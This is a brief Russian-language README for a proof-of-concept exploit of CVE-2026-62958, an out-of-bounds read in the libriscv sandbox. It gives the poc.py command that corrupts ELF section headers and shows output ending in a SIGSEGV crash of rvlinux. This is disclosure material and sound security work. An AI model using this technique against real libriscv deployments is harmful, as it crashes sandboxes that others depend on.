
Эксплойт для проверки концепции уязвимости CVE-2026-62958, демонстрирующий уязвимость чтения за пределами буфера в песочнице Libriscv, позволяющий вызвать аварийное завершение песочницы с помощью специально сформированного ELF-бинарного файла.
Уязвимость в Libriscv позволяет атакующему вызвать крах песочницы с помощью чтения за пределами границ (Out of Bounds Read).
Чтобы создать Bad elf:
python3 poc.py samplefile poisoned_file
Результаты:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)